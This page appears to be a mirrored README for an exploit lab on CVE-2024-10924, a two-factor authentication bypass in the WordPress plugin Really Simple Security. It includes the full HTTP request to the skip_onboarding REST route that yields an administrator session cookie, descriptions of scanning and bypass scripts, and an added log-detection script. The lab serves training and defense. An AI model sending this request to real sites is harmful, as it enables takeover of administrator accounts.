
POC details: 5836471f6358636acaba6c937268cd483e5555a5

Source
Related vulnerability
Title: WordPress plugin Really Simple Security security vulnerability (CVE-2024-10924)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application plugin. WordPress plugin Really Simple Security versions 9.0.0 through 9.1.1.1 contain a security vulnerability: the plugin includes an authentication bypass flaw.
Introduction
# CVE-2024-10924 Bypass MFA WordPress - Exploit Lab

This repository provides a lab for exploiting the `CVE-2024-10924` vulnerability in `WordPress`, specifically to bypass `two-factor authentication (MFA)` and gain access to the `WordPress` administration panel.

## Prerequisites

To deploy this lab in your environment, follow the steps below:

## **Deploy WordPress on VMware**

Unzip the lab `zip`. In VMware, click `Open` to import a machine, select the file called `Ubuntu-Bypass-MFA-Wordpress.vmx`, and finally click `Power` to turn on the vulnerable machine.

[Download LAB](https://drive.google.com/file/d/1a8h6HHDFfkyZRGUdvXdQtcYxLiXH8n_I/view?usp=sharing)

## **Configure Kali Linux**

On your Kali machine, install the necessary tools and make sure you have the following applications and Python libraries installed:

- `nmap`: To perform network scans.
- `requests`: Python library used to make HTTP requests (if you don't have it, install it with `pip install requests`).
- `rich`: Python library used for elegant output to the console (install with `pip install rich`).

## **Get WordPress machine IP**

To get the IP of the WordPress machine in the network environment, run the following script from your Kali machine:

```bash
$ python3 knowIPwordpress.py
```

This script does the following:

- Detects your local `IP`.
- Scans the corresponding network segment to find active `IPs`.
- Performs a port scan for `HTTP` services.
- Checks which `IP` serves a page with the title `"Bypass-MFA"` on its `HTTP` service; that is the WordPress machine.

Once found, it will show you the `URL` where you can access the `WordPress` administration panel:

```bash
Accede a WordPress en: http://<IP>/wp-admin
```

## Two-Factor Verification (MFA) Bypass:

### WordPress credentials:

```
admin:admin
```

When you try to log in to `WordPress`, it will ask you for `two-factor verification (MFA)`. To bypass this step, run the following script on your `Kali`:

```bash
$ python3 bypass-MFA-Wordpress.py
```

## How the `bypass-MFA-Wordpress.py` script works

This script exploits the `CVE-2024-10924` vulnerability and bypasses two-factor verification to gain access to the `WordPress` administration panel.

### Script flow:
Get session cookie: The script makes an `HTTP` request to the `reallysimplessl/v1/two_fa/skip_onboarding` endpoint to obtain a valid session cookie.

The request is sent with the following information:

```json
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```

### Login Request:
Once the cookie is obtained, the script asks for the `WordPress` username and password. It then makes a `POST` request to the `wp-admin/profile.php` endpoint with the provided credentials to log in.

### Generation of an HTML file:
If the bypass is successful, the script saves the response from the administrator dashboard to a `.html` file and opens it in your default browser.

You will now have access to the `WordPress` administration panel!

## Manual Bypass-MFA-Wordpress:

If you want to do it manually with `BurpSuite` and need to know the `Endpoint` to which the request has to be sent in order to capture the `Cookies`, run the following:

```bash
$ python3 endpointWordpress.py
```

This will print the request that we will have to put into `BurpSuite` to be able to capture the `Cookies`; in my case it looks like this:

```http
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```
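The request above is also what a defender should be looking for. As an added example (not part of this lab and not code from the Really Simple Security project), the following Python covers the two things a site owner can act on from the advisory and the request shown above: whether an installed plugin version falls in the affected range 9.0.0 to 9.1.1.1, and whether a web server access log contains requests to the `reallysimplessl/v1/two_fa/skip_onboarding` route. It goes slightly beyond the README by matching both the `?rest_route=` form shown above and the `/wp-json/` form, plain or percent-encoded. The combined log format, the `/wp-json/` prefix and the inclusive version range are assumptions about the deployment; the log lines are constructed sample data.

```python
"""Defender-side checks for CVE-2024-10924 (Really Simple Security 2FA bypass).

Two things a site owner can act on from the advisory and the request shown above:
  1. whether the installed plugin version is inside the affected range
     9.0.0 .. 9.1.1.1 (assumed inclusive at both ends), and
  2. whether the web server access log contains requests to the
     reallysimplessl/v1/two_fa/skip_onboarding REST route, which the lab's
     script sends to obtain an authenticated session cookie.
The sample log below is constructed data, not captured traffic.
"""
import re
import urllib.parse
from collections import Counter

# Affected range quoted from the advisory text (assumed inclusive at both ends).
AFFECTED_MIN = (9, 0, 0)
AFFECTED_MAX = (9, 1, 1, 1)

# REST route from the README; the /wp-json/ prefix is the pretty-permalink
# form of the same route (assumption about the server setup).
ROUTE = "/reallysimplessl/v1/two_fa/skip_onboarding"

# Apache/nginx "combined" access log layout (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_version(text: str) -> tuple:
    """'9.1.1.1' -> (9, 1, 1, 1); anything non-numeric is rejected."""
    parts = text.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected_version(text: str) -> bool:
    """True when the version falls in [9.0.0, 9.1.1.1].

    Python compares tuples element-wise and treats a shorter tuple as smaller
    when it is a prefix, so (9, 1, 1) <= (9, 1, 1, 1) holds and
    (9, 1, 2) <= (9, 1, 1, 1) does not.
    """
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX


def targets_skip_onboarding(target: str) -> bool:
    """Match both URL shapes WordPress accepts for a REST route:
    /wp-json/<route> and /?rest_route=<route> (plain or percent-encoded)."""
    path, _, query = target.partition("?")
    if urllib.parse.unquote(path).rstrip("/").endswith("/wp-json" + ROUTE):
        return True
    # parse_qsl percent-decodes values, so %2F-encoded routes are caught too.
    for key, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        if key == "rest_route" and value.rstrip("/") == ROUTE:
            return True
    return False


def find_skip_onboarding_requests(lines):
    """Return (ip, method, target, status) per hit; unparsable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and targets_skip_onboarding(m["target"]):
            hits.append((m["ip"], m["method"], m["target"], int(m["status"])))
    return hits


def summarize_by_ip(hits) -> Counter:
    """Count hits per source IP so a repeat source stands out immediately."""
    return Counter(ip for ip, *_ in hits)


# Constructed sample log: a normal login from .10, two route hits from .77
# (status 200, i.e. the plugin answered), one blocked hit from .78 (403), and
# a percent-encoded hit from .90. The last line is deliberately malformed.
SAMPLE_LOG = [
    '192.168.5.10 - - [19/Nov/2024:10:01:12 +0000] "GET /wp-login.php HTTP/1.1" 200 5123',
    '192.168.5.10 - - [19/Nov/2024:10:01:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '192.168.5.77 - - [19/Nov/2024:10:02:03 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 412',
    '192.168.5.77 - - [19/Nov/2024:10:02:04 +0000] "GET /wp-admin/ HTTP/1.1" 200 88123',
    '192.168.5.77 - - [19/Nov/2024:10:02:31 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 412',
    '192.168.5.78 - - [19/Nov/2024:10:03:40 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 403 95',
    '192.168.5.90 - - [19/Nov/2024:10:04:01 +0000] "POST /?rest_route=%2Freallysimplessl%2Fv1%2Ftwo_fa%2Fskip_onboarding HTTP/1.1" 200 412',
    'this line is not in combined log format',
]


if __name__ == "__main__":
    for v in ("8.9.9", "9.0.0", "9.1.0", "9.1.1.1", "9.1.2"):
        print(f"{v:8} {'AFFECTED' if is_affected_version(v) else 'not affected'}")
    hits = find_skip_onboarding_requests(SAMPLE_LOG)
    for ip, method, target, status in hits:
        print(f"{ip:14} {method:4} {status} {target}")
    print("hits per IP:", dict(summarize_by_ip(hits)))
```

A hit with status 200 from an address that had no prior `wp-login.php` success is the case worth paging on; a 403 means a WAF rule or the patched plugin rejected it. Point the script at a real log with `find_skip_onboarding_requests(open(path))` and feed the per-IP counts into whatever alerting you already have.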

## More information in my YT video:

LINK = [Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB](LINK)
File snapshot

```
[4.0K] /data/pocs/5836471f6358636acaba6c937268cd483e5555a5
├── [4.3K] bypass-MFA-Wordpress.py
├── [1.5K] endpointWordpress.py
├── [4.6K] knowIPwordpress.py
├── [4.0K] plugin_vuln
│   └── [1.3M] really-simple-ssl.zip
├── [3.7K] README.md
└── [4.0K] wordpressIMG-VMWare
    └── [ 144] DownloadLABWordpress.md

2 directories, 6 files
```